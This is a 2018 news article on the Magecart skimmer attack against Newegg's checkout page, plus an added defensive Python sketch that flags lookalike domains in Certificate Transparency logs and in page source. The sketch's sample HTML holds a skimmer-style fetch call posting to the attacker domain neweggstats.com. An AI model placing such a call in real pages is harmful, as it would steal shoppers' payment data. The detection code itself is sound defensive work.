
    Newegg Is Latest Retailer to Be a Victim of Magecart Malware

    By SEAN MICHAEL KERNER - September 20, 2018

      Online retailers have increasingly come under attack in 2018 from a hacking group known as Magecart. The latest victim is allegedly online computer parts retailer Newegg, which admitted on Sept. 19 that it was breached.

      Volexity Threat Research working in collaboration with RiskIQ identified the attack on Newegg. According to the two research groups, Newegg may have been breached for over a month, with attacks beginning on approximately Aug. 14. The research groups noted that the malicious code was removed from the Newegg site on Sept. 18.

      “Yesterday we learned one of our servers had been injected with malware which was identified and removed from our site,” Newegg wrote in a Twitter message. “We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted.”

      Magecart has been implicated in multiple high-profile attacks in recent months, including ones on British Airways on Sept. 7 and Ticketmaster on June 27. 

      Volexity reported that the Magecart attackers were able to inject a few lines of malicious JavaScript code onto a webpage that is shown to consumers during the Newegg checkout process. “The malicious code specifically appeared once when moving to the Billing Information page while checking out,” Volexity researchers wrote in a blog post. “This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com.”

      Attackers registered the neweggstats.com domain on Aug. 13, with an SSL/TLS certificate created for the site at the same time. According to Yonathan Klijnsma, threat researcher at RiskIQ, the Magecart attackers registered the domain in an attempt to blend in with Newegg’s primary domain.

      “Similar to the British Airways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page,” Klijnsma wrote in a blog post.

      Newegg has not publicly stated how many customers have been impacted by the data breach. The company has sent out a letter to customers, noting that it plans on publishing a complete set of details in an FAQ page by Sept. 21. In Klijnsma’s view, given that Newegg’s site gets approximately 50 million visitors a month and that the Magecart skimmer was active for a month, there could be a “massive” number of victims.

      Industry Reaction

      According to Craig Young, computer security researcher for Tripwire’s VERT (Vulnerability and Exposure Research Team), the Newegg breach is an example of how Certificate Transparency (CT) logs can be a useful source for threat intelligence. With CT logs, SSL/TLS certificates are logged and presented to the public, enabling organizations to identify any misissuance. There are multiple freely available tools for checking CT logs, including the Certificate Transparency Monitoring tool from social media giant Facebook.

      “In this case, the attack campaign started with the attackers setting up an HTTPS server at neweggstats.com,” Young wrote in an email to eWEEK. “For Newegg, seeing this domain come online wouldn’t immediately indicate a breach, but it should be enough for a security team to investigate further and likely reveal the newly added references to this domain in their checkout code.”
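
The workflow Young describes, sketched as an added example (not code from eWEEK, Tripwire or Newegg): scan certificate names from CT logs for unowned domains that resemble the brand, then check the checkout page source for references to them. The CT entries and HTML below are constructed samples, the owned-domain list and the two-label domain extraction are assumptions, and only neweggstats.com and its Aug. 13 date come from the article.

```python
import re

BRAND = "newegg"
OWNED = {"newegg.com"}  # assumption: inventory of domains the retailer controls

# Constructed sample of CT-log entries (SAN dNSNames per certificate). Only
# neweggstats.com and its date come from the article; the rest are made up.
CT_ENTRIES = [
    {"logged": "2018-08-13", "names": ["neweggstats.com", "www.neweggstats.com"]},
    {"logged": "2018-08-10", "names": ["*.newegg.com", "secure.newegg.com"]},
    {"logged": "2018-08-11", "names": ["shop.newegq.example"]},
    {"logged": "2018-08-12", "names": ["unrelated.example"]},
]
# Constructed checkout-page fragment (paths are illustrative) for the follow-up check.
CHECKOUT_HTML = '''
<script src="https://secure.newegg.com/js/checkout.js"></script>
<script>fetch("https://neweggstats.com/collect", {method: "POST"});</script>
'''

def registrable(name):
    """Naive eTLD+1 (last two labels); production use needs the Public Suffix List."""
    labels = name.lower().lstrip("*.").rstrip(".").split(".")
    return ".".join(labels[-2:])

def edit_distance(a, b):
    """Levenshtein distance using a single-row dynamic programming table."""
    row = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        prev, row[0] = row[0], i
        for j, cb in enumerate(b, 1):
            prev, row[j] = row[j], min(row[j] + 1, row[j - 1] + 1, prev + (ca != cb))
    return row[-1]

def flag_lookalikes(entries, brand=BRAND, owned=OWNED):
    """Return {domain: first_logged} for unowned domains that resemble the brand."""
    hits = {}
    for entry in entries:
        for name in entry["names"]:
            dom = registrable(name)
            label = dom.split(".")[0]
            # Flag brand-as-substring (neweggstats) and one-character typos.
            if dom not in owned and (brand in label or edit_distance(label, brand) <= 1):
                hits[dom] = min(entry["logged"], hits.get(dom, entry["logged"]))
    return hits

def references_in_page(html, domains):
    """List flagged domains that appear as URL hosts in the page source."""
    hosts = {registrable(h) for h in re.findall(r"https?://([A-Za-z0-9.-]+)", html)}
    return sorted(hosts & set(domains))
```

A hit from `flag_lookalikes` alone is a lead to investigate; a hit from `references_in_page` on a payment page is the stronger signal.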

      There are several things that consumers can do to help protect themselves from being a victim of a Magecart-related attack. Leigh-Anne Galloway, cyber-security resilience lead at Positive Technologies, commented in an email to eWEEK that consumers can use the NoScript browser extension to block potentially malicious JavaScript from running. She also recommends that banks make use of 3-D Secure technology, which is a protocol-based approach that requires additional confirmation when paying.

      “It’s also a good practice to connect SMS notification service so that if you see the notification of a suspicious operation, you can immediately block the card in order to avoid further fraudulent operations,” she said.

      Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com. Follow him on Twitter @TechJournalist.
